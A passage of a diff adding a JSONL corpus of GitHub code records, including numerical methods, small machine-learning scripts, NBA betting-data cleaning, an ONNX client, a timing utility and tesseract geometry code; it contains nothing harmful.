diff --git "a/3347.jsonl" "b/3347.jsonl"
new file mode 100644
--- /dev/null
+++ "b/3347.jsonl"
@@ -0,0 +1,1523 @@
+{"seq_id":"30745756926","text":"import os\r\nimport csv\r\nimport numpy as np\r\nimport scipy as sp\r\nfrom scipy.integrate import odeint\r\nfrom scipy.optimize import curve_fit\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n#RungeKutta4\r\ndef RK4(x,y,z,h,range,f1,f2):\r\n    X=[]\r\n    Y=[]\r\n    while x <= range:\r\n        k1= h*f1(z)\r\n        l1= h*f2(x,y,z)\r\n\r\n        k2= h*f1(z+l1/2)\r\n        l2= h*f2(x+h/2,y+k1/2, z+l1/2)\r\n\r\n        k3= h*f1(z + l2 / 2)\r\n        l3= h*f2(x + h / 2, y + k2 / 2, z + l2 / 2)\r\n\r\n        k4= h*f1(z + l3)\r\n        l4= h*f2(x + h, y + k3, z + l3)\r\n\r\n        y= y+1/6*(k1 +2*k2 +2*k3 +k4)\r\n        z= z+1/6*(l1 +2*l2 +2*l3 +l4)\r\n        x= x+h\r\n\r\n\r\n        X.append(x)\r\n        Y.append(y)\r\n    return X,Y\r\n","repo_name":"Soumik77777/OpenLab_P441_442_2021","sub_path":"Exp1_Gravity_driven_oscillation/rk4.py","file_name":"rk4.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
+{"seq_id":"21942468493","text":"import numpy as np\nfrom numpy.linalg import inv\n\ndef mu(beta, X):\n    return 1.0 / (1.0 + np.exp(-X.dot(beta)))\n\ndef diag(mu):\n    return np.diag(np.ndarray.flatten(np.multiply(mu, 1.0 - mu)))\n\ndef update(beta, mu_B, X, Y, lamb):\n    I = np.eye(beta.size)\n    hessian_inv = inv(2*lamb*I + X.T.dot(diag(mu_B)).dot(X))\n    gradient = 2*lamb * I.dot(beta) - X.T.dot(Y - mu_B)\n    return beta - hessian_inv.dot(gradient)\n\nif __name__ == \"__main__\":\n    X = np.array([[0, 3, 1], [1, 3, 1], [0, 1, 1], [1, 1, 1]]) # 4 x 3\n    Y = np.array([[1], [1], [0], [0]]) # 4 x 1\n    B0 = np.array([[-2], [1], [0]]) # 3 x 1\n    LAMBDA = 0.07\n    mu0 = mu(B0, X)\n    B1 = update(B0, mu0, X, Y, LAMBDA)\n    mu1 = mu(B1, X)\n    B2 = update(B1, mu1, X, Y, LAMBDA)\n    print(\"\\nmu_0:\\n\")\n    print(mu0)\n    print(\"\\nbeta_1:\\n\")\n    print(B1)\n    print(\"\\nmu_1:\\n\")\n    print(mu1)\n    print(\"\\nbeta_2:\\n\")\n    print(B2)\n","repo_name":"mkjois/edu","sub_path":"cs189/hw4/p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"}
+{"seq_id":"926130462","text":"import re\nvalue = input()\nn1 = '\\n' #Variável para usaliza \\n na f-string\nc = '[qwrtypsdfghjklzxcvbnm]'\nm = re.findall(r'(?<='+ c +')([aeiou]{2,})'+ c, value, re.I)\n#re.I serve pra utlizar letrar maiúsculas e minúsculas\n\nprint('\\n'.join(m or ['-1']))\n\n\n# import re\n# value = input()\n# c = '[qwrtypsdfghjklzxcvbnm]'\n# x = r'(?<='+ c +')([aeiouAEIOU]{2,})'+ c\n# d = re.compile(x)\n# m = d.findall(value)\n\n# print(f\"{n1.join(m or ['-1'])}\")\n#f-string não aceita \\\n","repo_name":"AntonioBretas/hackerank-training","sub_path":"Exercício/findallfinditer.py","file_name":"findallfinditer.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
+{"seq_id":"32601093061","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jan  9 12:49:11 2021\r\n\r\n@author: Irfan Sheikh\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport tensorflow as tf\r\ntf.__version__\r\n\r\ndf=pd.read_excel(\"D:\\Data Science\\Deep Learning\\Deep Learning Practice\\ANN\\\\Folds5x2_pp.xlsx\")\r\n \r\nX=df.iloc[:,:-1].values\r\nY=df.iloc[:,-1].values\r\n\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nX_train,X_test,Y_train,Y_test=train_test_split(X,Y,test_size=0.2,random_state=0)\r\n\r\n\r\n#Initializing 
ANN#\r\n\r\nann=tf.keras.models.Sequential()\r\n\r\n#Adding Input layer and first hidden layer#\r\n\r\nann.add(tf.keras.layers.Dense(units=6,activation=\"relu\"))\r\n\r\n#Adding Second hidden layer#\r\nann.add(tf.keras.layers.Dense(units=6,activation=\"relu\"))\r\n\r\n#Adding outpu layer#\r\nann.add(tf.keras.layers.Dense(units=1))\r\n\r\n#Compiling ANN#\r\nann.compile(optimizer=\"adam\",loss=\"mean_squared_error\")\r\n\r\n#Training ANN \r\n\r\nann.fit(X_train,Y_train,batch_size=32,epochs=100)\r\n\r\n#Predicting on test data#\r\n\r\ny_pred=ann.predict(X_test)\r\nnp.set_printoptions(precision=2)\r\nprint(np.concatenate((y_pred.reshape(len(y_pred),1),Y_test.reshape(len(Y_test),1)),1))\r\n","repo_name":"Irfan-S-1/Deep-Learning","sub_path":"ann_regression.py","file_name":"ann_regression.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37008173769","text":"import pickle\nimport os\nimport glob\nimport sys\nfrom cleaningFunctions import full2abv\n# with open('box_team_results_cleaned.pkl','rb') as handle:\n# full_results = pickle.load(handle)\nfrom collections import defaultdict\n\nmain_path = '/Users/MarkJaj/Documents/github/bbrefpy/BoxScores/BoxScores/spiders/line_pickles'\ndef getYear(s):\n year = s[:4]\n month = s[4:6]\n day = s[-2:]\n if int(month)<6:\n return str(int(year)-1)\n return year\n\n\n# results = defaultdict(dic2\n\n# for f in full_results:\n# results[getYear(f)][f] = full_results[f]\ndef organizeAllBets(linepath):\n lines = {}\n matchups = {}\n game_ids = defaultdict(list)\n get_year = lambda year,month: year if month in ['08','09','10','11','12'] else str(int(year)-1)\n for p in glob.glob(linepath+'/*.pkl'):\n with open(p,'rb') as handle:\n full = pickle.load(handle)\n year = p.split('/')[-1]\n year,month = year[4:8],year[8:-4]\n m = month if len(month)==2 else '0'+month\n bb_year = get_year(year,m)\n for f in full:\n if not all(f):continue\n h,a = f[1][0],f[2][0]\n d = f[0]\n gid = year+m+d+'0'+full2abv[h]\n gid = gid if gid[-3:]!='CHO' else gid[:-3]+'CHA'\n lines[gid] = f\n matchups[gid] = (h,a)\n game_ids[bb_year].append(gid)\n\n return game_ids,lines,matchups\n\n\ndef cleanBetsForYear(cYear):\n\n game_ids = {str(cYear):[],str(cYear+1):[]} \n lines = {}\n for p in glob.glob(main_path+'/*.pkl'):\n with open(p,'rb') as handle:\n full = pickle.load(handle)\n year = p.split('/')[-1]\n year,month = year[4:8],year[8:-4]\n m = month\n if (year ==str(cYear)):\n for f in full:\n # print(f)\n if not all(f):\n continue\n h,a = f[1][0],f[2][0]\n d = f[0]\n if int(m)<7:\n year = str(cYear+1)\n gid = year+m+d+'0'+full2abv[h]\n gid = gid if gid[-3:]!='CHO' else gid[:-3]+'CHA'\n addD = lambda x: x if len(x) == 12 else x[:4] + '0' + x[4:]\n\n lines[addD(gid)] = f\n game_ids[year].append(gid)\n return game_ids,lines\n\n\n\ndef combineData(bbdata,game_ids,lines,goal_year):\n '''\n bettings lines have incorrect dates, but correct order\n use the structure of bbreff data to organize nowgoal data\n '''\n bet_lines = {}\n current = '00'\n prev_games = []\n i = 0\n err = []\n for g in zip(sorted(bbdata),(game_ids[str(goal_year)]+game_ids[str(goal_year+1)])):\n # print(g)\n # print(i, g)\n i+=1\n if g[0][-6:-4] != current: # if bb day different than current day (chould change 1st)\n current = g[0][-6:-4]\n # try:\n tofix = {x[1][-3:]:x[1] for x in prev_games}\n fixed = {x[0]:tofix[x[0][-3:]] for x in prev_games}\n for c in fixed:\n bet_lines[c] = lines[fixed[c]]\n\n prev_games = [g]\n continue\n 
prev_games.append(g)\n return bet_lines\n\n\ndef clean2015(res_2015,bet_lines):\n '''\n hardcode in last set of games for 2015:2016 season\n NEED TO FIX SO IT DOESNT NEED THIS\n '''\n for g in sorted(bet_lines):\n bet_lines[g] = bet_lines[g][-4:]\n notworking = [x.upper() for x in 'dal hou cho mil min was bos brk cle chi lal pho por gsw'.split(' ')]\n ans = ['5 187.5 52-34','15 220 64-44','7.5 211 66-50','4.5 201.5 46-62',\n '10 212.5 72-50','-9 210 57-59','4.5 206 38-62','-5.5 206.5 47-49','4 194 44-58',\n '9.5 210 51-60','-3.5 196 42-57','5 205.5 62-55','10 217 58-56','17.5 212.5 70-50']\n scores = '91-96 116-81 117-103 92-97 144-109 109-98 98-88 96-103 110-112 115-105 101-96 114-105 107-99 125-104'.split(' ')\n fix = dict(zip(notworking,zip(scores,[x.split(' ') for x in ans])))\n\n for g in sorted(res_2015)[1216:1230]:\n a = fix[g[-3:]]\n bet_lines[g] = [a[0].split('-')] + [[x] for x in a[1] ]\n\n\n for b in sorted(bet_lines):\n bet_lines[b] = [x[0] for x in bet_lines[b][1:]]\n return bet_lines\n\n\ndef clean2014(res_2014,bet_lines):\n '''\n hardcode in last set of games for 2014:2015 season\n '''\n\n for g in sorted(bet_lines):\n bet_lines[g] = bet_lines[g][-4:]\n notworking = [x.upper() for x in 'tor nyk chi brk cle hou nop dal min mil phi mem lal gsw'.split(' ')]\n ans = ['92-87 10.5 194','90-112 -9 193','91-85 5 197.5','101-88 9 203.5','113-108 8 192',\n '117-91 11.5 193.5','108-103 -5.5 193','114-98 6 208.5','113-138 -14 211',\n '100-105 6 198','101-105 2 192','95-83 -2 184.5','99-122 3 206.5','133-126 11.5 215.5']\n fix = dict(zip(notworking,ans))\n for g in sorted(res_2014)[1216:1230]:\n a = fix[g[-3:]].split(\" \")\n bet_lines[g] = [a[0].split('-'),[a[1]],[a[2]]]\n for b in sorted(bet_lines):\n bet_lines[b] = [bet_lines[b][0][0],bet_lines[b][0][1],bet_lines[b][1][0],bet_lines[b][2][0]]\n # print(b)\n return bet_lines\ndef clean2013(res_2013,bet_lines):\n\n for g in sorted(bet_lines):\n bet_lines[g] = bet_lines[g][-4:]\n teamnames = 'brk lac bos cha cle den mem mia mil min nop nyk okc orl por sac sas'\n teamnames = 'dal hou cha mil min was bos brk cle chi lal pho por gsw'\n teamnames = 'bos cha cle den mem mia mil min nop nyk okc orl por sac sas'\n teamnames = 'orl cha min nop nyk sas cle okc mia bos mil mem por den sac'\n notworking = [x.upper() for x in teamnames.split(' ')]\n ans = ['86-101 3.5 187','91-86 1.5 180.5','130-136 11.5 210.5','105-100 3 208.5','95-92 -6 198.5',\n '100-113 9 217','114-85 8 198','112-111 14.5 212.5','87-100 5.5 208','102-118 -8 197.5','103-111 3 205',\n '106-105 3 190.5','110-104 3 207','112-116 8 209.5','99-104 -2.5 208']\n fix = dict(zip(notworking,ans))\n for g in sorted(res_2013)[1215:1230]: \n a = fix[g[-3:]].split(\" \")\n bet_lines[g] = [a[0].split('-'),[a[1]],[a[2]]]\n for b in sorted(bet_lines):\n bet_lines[b] = [bet_lines[b][0][0],bet_lines[b][0][1],bet_lines[b][1][0],bet_lines[b][2][0]]\n \n return bet_lines\ndef run2013(year = 2013):\n with open('results_by_year.pkl','rb') as handle:\n res_f = pickle.load(handle)\n res_20x = res_f[str(year)]\n goal_year = year\n game_ids,lines = cleanBetsForYear(goal_year)\n res_20x = [x for x in res_20x if (x[:4]==str(year) and int(x[4:6])>7) or (x[:4]==str(year+1)and int(x[4:5]) <7)]\n\n addD = lambda x: x if len(x)==12 else x[:4]+'0'+x[4:]\n res_20x = [addD(x) for x in res_20x]\n\n\n # res_20x = [ x if x[-3:]!='CHA' else x[:-3]+'CHO']\n game_ids[str(year)] = [addD(x) for x in game_ids[str(year)]]\n game_ids[str(year+1)] = [addD(x) for x in game_ids[str(year+1)]]\n\n game_ids[str(year)] = [x if 
x[-3:]!='CHO' else x[:-3]+'CHA' for x in game_ids[str(year)] ]\n game_ids[str(year+1)] = [x if x[-3:]!='CHO' else x[:-3]+'CHA' for x in game_ids[str(year+1)] ]\n bet_lines = combineData(res_20x,game_ids,lines,goal_year)\n print(len(bet_lines))\n sol2013 = clean2013(res_20x,bet_lines)\n # print( sorted(res_20x)[1215:1230])\n\ndef combineData2(bbdata,game_ids,lines):\n '''\n bettings lines have incorrect dates, but correct order\n use the structure of bbreff data to organize nowgoal data\n '''\n bet_lines = {}\n current = '00'\n prev_games = []\n i = 0\n err = []\n for g in zip(sorted(bbdata),game_ids):\n\n i+=1\n if g[0][-6:-4] != current: # if bb day different than current day (chould change 1st)\n current = g[0][-6:-4]\n # try:\n tofix = {x[1][-3:]:x[1] for x in prev_games}\n print(\"TOFIX: \",tofix)\n print(\"PREV: \",prev_games)\n print(i)\n fixed = {x[0]:tofix[x[0][-3:]] for x in prev_games}\n print(\"FIXED: {0}\".format(fixed),i)\n for c in fixed:\n if c[-3:]=='NOH':\n bet_lines[c] = lines[fixed[c][:-3]+'NOP']\n else:\n bet_lines[c] = lines[fixed[c]]\n\n prev_games = [g]\n continue\n prev_games.append(g)\n return bet_lines\n\ndef groupBy3(lst):\n out = defaultdict(list)\n for game in lst:\n out[game[-3:]].append(game)\n return out\ndef connectList(ls1,ls2):\n \"\"\"\n Assuming games by each team,last 3 chars of list, appear in order.\n give dicts to go from one list to another\n \"\"\"\n s1,s2 = groupBy3(ls1),groupBy3(ls2)\n bb2line = {}\n line2bb = {}\n for a in set([a for a in s1]+[b for b in s2]):\n # print(a)\n for i,j in zip(s1[a],s2[a]):\n # print('\\t',i,j)\n bb2line[i] = j\n line2bb[j] = i\n return bb2line,line2bb\n\n \ngames,lines,matchups = organizeAllBets('../Data/line_pickles2')\n\nwith open('../Data/Clean/TeamBoxByYear/results_2012.pkl','rb') as handle:\n res12 = pickle.load(handle)\n\n\nfor i in range(len(games['2012'])):\n team = games['2012'][i]\n if team[-3:]=='NOP':\n games['2012'][i] = team[:-3]+'NOH'\n\ndef removeDuplicatePreserveOrder(seq):\n seen = set()\n seen_add = seen.add\n return [x for x in seq if not (x in seen or seen_add(x))]\n\nbbD,lineD = connectList(sorted(res12),removeDuplicatePreserveOrder(games['2012']))\n\n\n# for g in zip(sorted(set(games['2012'])),sorted(lineD),sorted(res12)):\n# # print(game,lineD[game])\n# print(g)\nz = groupBy3(games['2012'])\nfor g in z:\n print(g,len(z[g]))\n i=0\n for game in sorted(z[g]):\n i+=1\n print('\\t',game,matchups[game])\n\n\n\n\n","repo_name":"jawjay/mj-beats-vegas","sub_path":"Cleaning/preProcess.py","file_name":"preProcess.py","file_ext":"py","file_size_in_byte":9613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"40072164556","text":"import requests\nimport base64\nimport numpy as np\nfrom onnx import numpy_helper\nimport onnx\nfrom google.protobuf.json_format import MessageToJson\nimport json\nimport tools.data_util as data_util\nimport tools.defaults as defaults\n\ndef main():\n \"\"\"\n You need to run onnx runtime server on your localhost in advance.\n \"\"\"\n ENDPOINT = 'http://localhost:8001/v1/models/default/versions/1:predict'\n json_request_headers = {\n 'Content-Type': 'application/json',\n 'Accept': 'application/json'\n }\n\n colors = defaults.COLORS\n for color in colors:\n input_array = data_util.get_transformed_array(color)\n tensor_proto = numpy_helper.from_array(input_array)\n json_str = MessageToJson(tensor_proto, use_integers_for_enums=True)\n data = json.loads(json_str)\n\n inputs = {}\n inputs['input_0'] = data\n output_filters 
= ['output_0']\n\n payload = {}\n payload[\"inputs\"] = inputs\n payload[\"outputFilter\"] = output_filters\n\n res = requests.post(ENDPOINT, headers=json_request_headers, data=json.dumps(payload))\n raw_data = json.loads(res.text)['outputs']['output_0']['rawData']\n outputs = np.frombuffer(base64.b64decode(raw_data), dtype=np.float32)\n pred = np.argmax(outputs)\n\n assert defaults.COLORS[pred] == color\n print(\"Great! Label = {}, Pred = {}.\".format(defaults.COLORS[pred], color))\n\nif __name__ == '__main__':\n main()","repo_name":"rskmoi/onnx-runtime-with-torch-example","sub_path":"04_onnxruntime_server_json.py","file_name":"04_onnxruntime_server_json.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"23483477944","text":"import random\r\nrock = '''\r\n _______\r\n---' ____)\r\n (_____)\r\n (_____)\r\n (____)\r\n---.__(___)\r\n'''\r\n\r\npaper = '''\r\n _______\r\n---' ____)____\r\n ______)\r\n _______)\r\n _______)\r\n---.__________)\r\n'''\r\n\r\nscissors = '''\r\n _______\r\n---' ____)____\r\n ______)\r\n __________)\r\n (____)\r\n---.__(___)\r\n'''\r\n\r\ndef cals(value):\r\n for your in range (0,len(value)):\r\n if value[your] == 0 and your == 0:\r\n print(\"You chosen Rock\"+rock)\r\n elif value[your] == 0 and your == 1:\r\n print(\"Computer chosen Rock\"+rock)\r\n elif value[your] == 1 and your == 0:\r\n print(\"You Chosen Paper\"+paper)\r\n elif value[your] == 1 and your == 1:\r\n print(\"Computer chosen Paper\"+paper)\r\n elif value[your] == 2 and your == 0:\r\n print(\"You Chosen Scissors\"+scissors)\r\n elif value[your] == 2 and your == 1:\r\n print(\"Computer chosen Scissors\"+scissors)\r\n else:\r\n print(f\"The Entered Number {your} is invalid\")\r\n\r\ndef result(value):\r\n if value[0]==value[1]:\r\n print(\"The Match is Draw\")\r\n elif value[0]==0 and value[1]==1 or value[0]==1 and value[1]==2 or value[0]==2 and value[1]==0:\r\n print(\"The computer wins the game and you lose\")\r\n print(\"\\n\\n\\n\\n\\nDon't Lose Your Hope\")\r\n elif value[0]==1 and value[1]==0 or value[0]==2 and value[1]==1 or value[0]==0 and value[1]==2:\r\n print(\"You wins the Game and the computer lose\")\r\n print(\"\\n\\n\\n\\n\\nKeep on Going\")\r\n\r\nprint(f\"ROCK: {rock}\\n PAPER: {paper}\\n SCISSORS: {scissors}\")\r\nyours = input(\"What do you choose ?\\nPress 0 for Rock,1 for Paper or 2 for Scissors\\n\")\r\ncomp_choice = random.randint(0,2)\r\nvalue =[int(yours),comp_choice]\r\ncals(value)\r\nresult(value)","repo_name":"SakthiCa/Python-Projects","sub_path":"Mini Projects/rock_paper_Scissor.py","file_name":"rock_paper_Scissor.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"19941571172","text":"\"\"\" pytest configuration \"\"\"\nimport os\nimport sys\nimport time\nimport json\nfrom argparse import Namespace\nimport pytest\n\ndef pytest_addoption(parser):\n \"\"\"Add command line options\"\"\"\n parser.addoption(\"--lmenv\",\n action=\"store\",\n required=True,\n help=\"Path to .lmenv file\")\n\ndef pytest_configure(config):\n \"\"\"Configure pytest\"\"\"\n # Read .lmeenv file\n lmenv_path = config.getoption(\"--lmenv\")\n with open(lmenv_path) as f:\n config = json.load(f)\n\n # Add root directory and binary directory to sys.path\n if config['path'] not in sys.path:\n sys.path.insert(0, config['path'])\n if config['bin_path'] not in sys.path:\n sys.path.insert(0, 
config['bin_path'])\n\n # Make lmenv accessible from the test code\n pytest.lmenv = Namespace(**config)\n","repo_name":"lightmetrica/lightmetrica-v3","sub_path":"pytest/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":100,"dataset":"github-code","pt":"5"} +{"seq_id":"18114654987","text":"import numpy as np\nimport scipy \n\nclass Trapezoid:\n def __init__(self, x1, x2, yl, ymid, yr):\n self.x1 = x1\n self.x2 = x2\n self.yl = yl\n self.ymid = ymid\n self.yr = yr\n\n def calc(self, x: float) -> float:\n if x < self.x1:\n return self.ymid + (x - self.x1) * (self.ymid - self.yl) / (self.x1 + 100)\n elif x > self.x2:\n return self.ymid + (x - self.x2) * (self.yr - self.ymid) / (100 - self.x2)\n else:\n return self.ymid\n\ndef learn_trapezoid(xs, ys, yerrs):\n xs = np.array(xs)\n ys = np.array(ys)\n assert(len(xs) == len(ys))\n x0 = [-75, 75, -50, -5, -50]\n\n def helper(x):\n trap = Trapezoid(*x)\n\n errs = [(ys[i] - trap.calc(xs[i])) for i in range(len(xs))]\n retval = np.square(errs).sum()\n\n too_far_penalty = 0\n too_far_penalty += max(0, -x[0] - 90)*100\n too_far_penalty += max(0, x[1] - 90)*100\n return retval + too_far_penalty\n\n return Trapezoid(*scipy.optimize.minimize(helper, x0, tol=1e-10).x)","repo_name":"kobortor/BerkeleyAlgo","sub_path":"trapezoid.py","file_name":"trapezoid.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7408769717","text":"#!/usr/bin/env python3\n\nimport argparse\nimport subprocess\nimport time\nimport sys\nimport random\n\ndef parse_args():\n p = argparse.ArgumentParser()\n p.add_argument(\"--times\", type=int, default=10)\n p.add_argument(\"command\", nargs='*')\n return p.parse_args()\n\ndef bootstrap(data, times=1000, interval=0.95):\n samples = []\n ldata = len(data)\n for _ in range(times):\n sampled = []\n for num in range(ldata):\n sampled.append(data[random.randrange(ldata)])\n samples.append(sum(sampled) / ldata)\n samples.sort()\n remain = (1.0 - interval) / 2\n bot_idx = int(times * remain)\n top_idx = int(times * (1.0 - remain))\n return samples[bot_idx], samples[top_idx]\n\n\n\ndef execute(command, nrun, total):\n start = time.monotonic()\n rcode = subprocess.call(command)\n end = time.monotonic()\n dur = end - start\n cmdstring = \" \".join(command)\n if len(cmdstring) > 23:\n cmdstring = cmdstring[:20] + \"...\"\n print(f\"{rcode} <- [{dur:.2F}s] ({nrun + 1}/{total}) {cmdstring}\", file=sys.stderr)\n return dur\n\ndef main(args):\n times = []\n for i in range(args.times):\n exec_time = execute(args.command, i, args.times)\n times.append(exec_time)\n\n times.sort()\n\n avg_time = sum(times) / len(times)\n all_times_str = \",\".join(format(x, \".2F\") for x in times)\n time_ci_bot, time_ci_top = bootstrap(times)\n print(f\"{avg_time:.2F} ({time_ci_bot:.2F}, {time_ci_top:.2F})\\t{all_times_str}\\n\")\n\n\n\nif __name__ == \"__main__\":\n main(parse_args())","repo_name":"eiennohito/xtime","sub_path":"xtime.py","file_name":"xtime.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22912294198","text":"import numpy as np\nfrom pyray.shapes.fourd.tesseract_graph import TsrctFcGraph\nimport pyray.shapes.solid.open_cube as oc\nfrom pyray.rotation2.rotn_4d import rotate_points_about_plane\nfrom copy import deepcopy\nfrom PIL import Image, ImageDraw\nfrom 
pyray.rotation import rotation, axis_rotation\nfrom pyray.rotation2.rotn_4d import rotate_points_about_plane_helper\nfrom pyray.shapes.fourd.tesseract_graph import Face1\nimport queue\n\n\nclass TsrctCube(TsrctFcGraph):\n def __init__(self, key='000+', rot_sign=1) -> None:\n super().__init__()\n self.color = \"white\"\n self.key = key\n self.faces = {}\n self.rot_sign = rot_sign\n for i in range(len(key)):\n ch = key[i]\n if ch == '0':\n for ch1 in ['+', '-']:\n str1 = ''\n for j in range(len(key)):\n if j != i:\n str1 = str1 + key[j]\n else:\n str1 = str1 + ch1\n self.faces[str1] = deepcopy(self.vert_props[str1])\n\n self.cube_center = []\n for ch in self.key:\n if ch == '0':\n self.cube_center.append(0)\n elif ch == '+':\n self.cube_center.append(1)\n else:\n self.cube_center.append(-1)\n self.cube_center = np.array(self.cube_center)\n self.o_cube_center = deepcopy(self.cube_center)\n\n def get_common_face(self, other_key='000+'):\n return get_common_face(self.key, other_key)\n \n def plot_perspective(self, draw, r, persp=5, rgba=(123, 22, 10, 40),\n shift=np.array([256, 256, 0, 0]),\n scale=35):\n for f in self.faces.keys():\n self.faces[f].plot_perspective(draw, r, e=persp, c=-persp, \n rgba=rgba, shift=shift, scale=scale)\n\n def rotate(self, ax1, ax2, ax3, theta, ref_pt=None, take_further=True):\n for ff in self.faces.keys():\n self.faces[ff].rotate_about_plane(ax1, ax2, ax3, theta)\n # if self.rot_sign != 0:\n # self.faces[ff].rotate_about_plane(ax1, ax2, ax3, theta*self.rot_sign)\n # elif ss != 0:\n # self.faces[ff].rotate_about_plane(ax1, ax2, ax3, theta*ss)\n # else:\n # self.faces[ff].rotate_about_plane(ax1, ax2, ax3, theta,\n # ref_pt, \n # take_farther=take_further)\n\n def reset(self):\n for fc in self.faces.keys():\n self.faces[fc].reset()\n\n\nclass TsrctCubeTree(TsrctFcGraph):\n def __init__(self, free_rot=False, take_further=True) -> None:\n super().__init__()\n self.max_depth = 0\n self.face_map = self.vert_props\n self.cubes = {'000+':0, '000-':1,\n '00+0':2, '00-0':3,\n '0+00':4, '0-00':5,\n '+000':6, '-000':7}\n self.cube_map = {}\n for k in self.cubes.keys():\n self.cube_map[k] = TsrctCube(k)\n # Legacy methods still use vert_props.\n self.vert_props = self.cube_map\n self.adj = {\n '000-': ['00-0','+000','0-00','-000','0+00','00+0'],\n '00-0': ['000+']\n }\n self.black_verts = set()\n self.grey_verts = set()\n self.cube_arr = []\n self.rot_arr = []\n self.theta = np.pi/20.0\n self.free_rot = free_rot\n self.take_further = take_further\n\n def plot(self, draw, r, persp=5, rgba=(123, 22, 10, 40),\n shift=np.array([256, 256, 0, 0]),\n scale=35):\n for c1 in self.cube_map.keys():\n self.cube_map[c1].plot_perspective(draw, r, persp\n , rgba=rgba,\n shift=shift,\n scale=scale)\n\n def dfs_flatten(self, u):\n self.cube_map[u].color = \"grey\"\n self.grey_verts.add(u)\n u_cube = self.cube_map[u]\n for i in range(len(self.cube_arr)):\n cc = self.cube_arr[i]\n cu = self.cube_map[cc]\n pi_name = self.cube_map[cu.key].pi\n pi = self.cube_map[pi_name]\n if cc not in self.black_verts and cc in self.grey_verts:\n rot1 = self.rot_arr[i]\n if self.free_rot:\n rot1.do_rotate(u_cube, theta=self.theta)\n else:\n rot1.do_rotate(u_cube, theta=self.theta,\n ref_pt=pi.cube_center,\n take_further=self.take_further)\n\n if u in self.adj:\n for v in self.adj[u]:\n if self.cube_map[v].color == \"white\":\n # Apply rotations of grey vertices.\n self.cube_arr.append(v)\n c0 = self.cube_map[u]\n c1 = self.cube_map[v]\n sign = self.cube_map[v].rot_sign\n rot1 = Rotation(c0, c1, sign)\n 
self.rot_arr.append(rot1)\n self.dfs_flatten(v)\n self.cube_map[u].color = \"black\"\n self.black_verts.add(u)\n\n def bfs(self, s):\n #self.grey_verts.add(s)\n self.cube_map[s].color = \"grey\"\n self.cube_map[s].d = 0\n q = queue.Queue()\n q.put(s)\n while q.qsize() > 0:\n u = q.get()\n if u in self.adj:\n for v in self.adj[u]:\n if self.cube_map[v].color == \"white\":\n self.cube_map[v].color = \"grey\"\n self.cube_map[v].d = self.cube_map[u].d + 1\n if self.max_depth < self.cube_map[v].d:\n self.max_depth = self.cube_map[v].d\n self.cube_map[v].pi = u\n self.cube_map[v].rot_sign = get_rot_sign(u, v)\n q.put(v)\n self.cube_map[u].color = \"black\"\n self.black_verts.add(u)\n\n def reset(self):\n for cu in self.cube_map.keys():\n self.cube_map[cu].reset()\n\n\ndef get_rot_sign(u, v):\n fc1 = get_common_face(u, v)\n face1 = Face1(fc1)\n cu = TsrctCube(u)\n cv = TsrctCube(v)\n pt1 = deepcopy(cv.cube_center)\n pts2 = rotate_points_about_plane_helper(np.array([pt1]), \n face1.vertices[0], \n face1.vertices[1], \n face1.vertices[2],\n np.random.normal(size=4),\n np.pi/2)\n if sum((pts2[0] - cu.cube_center)**2) < 1:\n return -1\n return 1\n\n\nclass Rotation():\n def __init__(self, c0, c1, sign=1):\n self.c0 = c0\n self.c1 = c1\n self.sign = sign\n f1 = get_common_face(c0.key, c1.key)\n fc1 = c0.faces[f1]\n self.ax1, self.ax2, self.ax3 = \\\n fc1.vertices[0], fc1.vertices[1],\\\n fc1.vertices[2]\n #self.ref_pt = c0.cube_center\n self.ref_pt = np.array([0,0,0,0])\n\n def do_rotate(self, c1, theta=np.pi*3/200.0, ref_pt=None, \n take_further=True):\n # c1.rotate(self.ax1, self.ax2, self.ax3, \\\n # theta, ref_pt=ref_pt, take_further=take_further)\n c1.rotate(self.ax1, self.ax2, self.ax3, \\\n theta*self.sign)\n\n\nclass MshObj():\n def __init__(self, tt, r, scale, shift, persp):\n self.tt = tt\n self.r = r\n self.scale = scale\n self.shift = shift\n self.persp = persp\n \n def plot(self, draw, rgba=(100,100,100,40)):\n self.tt.plot(draw, self.r, rgba=rgba,\n shift=self.shift,\n scale=self.scale,\n persp=self.persp)\n\n\ndef get_common_face(f1='000+', f2='00-0'):\n res = []\n for i in range(len(f1)):\n if f1[i] != '0':\n res.append(f1[i])\n elif f2[i] != '0':\n res.append(f2[i])\n else:\n res.append('0')\n return ''.join(res)\n\n\ndef primitive_tsrct_open(persp=0, i=0, r=rotation(4, np.pi*17/60.0), theta=np.pi/20.0):\n \"\"\"\n Primitive way to open a cube.\n \"\"\"\n im = Image.new(\"RGB\", (512, 512), (0, 0, 0))\n draw = ImageDraw.Draw(im, 'RGBA')\n tf = TsrctCubeTree()\n c0 = tf.cube_map['000-']\n c1 = tf.cube_map['-000']\n c2 = tf.cube_map['+000']\n c3 = tf.cube_map['0+00']\n c4 = tf.cube_map['0-00']\n c5 = tf.cube_map['00+0']\n c6 = tf.cube_map['00-0']\n c7 = tf.cube_map['000+']\n #\n f1 = get_common_face(c0.key, c1.key)\n fc1 = 